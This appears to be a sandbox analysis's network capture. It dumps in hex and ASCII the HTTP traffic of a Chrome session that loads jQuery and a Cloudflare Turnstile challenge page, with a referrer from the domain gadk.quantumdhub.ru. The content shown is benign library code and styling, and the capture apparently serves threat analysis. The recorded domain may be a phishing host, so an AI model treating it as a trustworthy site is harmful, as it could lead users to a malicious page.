                                                                                                                                                                                                                                                          X-Cache-Hits: 2774, 34
                                                                                                                                                                                                                                                          X-Timer: S1734737752.017104,VS0,VE0
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          2024-12-20 23:35:52 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                          2024-12-20 23:35:52 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                                                                          2024-12-20 23:35:52 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                                                                          2024-12-20 23:35:52 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                                                                          2024-12-20 23:35:52 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                                                                          2024-12-20 23:35:52 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                                                                          2024-12-20 23:35:52 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                                                                          2024-12-20 23:35:52 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                                                                          2024-12-20 23:35:52 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                                                                          2024-12-20 23:35:52 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                                                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          7192.168.2.549727104.18.95.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC799OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                          Referer: https://gadk.quantumdhub.ru/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:53 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Content-Length: 26678
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                                                                                                                          cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                                          cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                          origin-agent-cluster: ?1
                                                                                                                                                                                                                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                          referrer-policy: same-origin
                                                                                                                                                                                                                                                          document-policy: js-profiling
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 35 33 37 33 38 66 35 63 66 61 31 35 62 62 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: Server: cloudflareCF-RAY: 8f53738f5cfa15bb-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                                                                                                                                                          Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                                                                                                                                                          Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                                                                                                                                                          Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                                                                                                                                                          Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
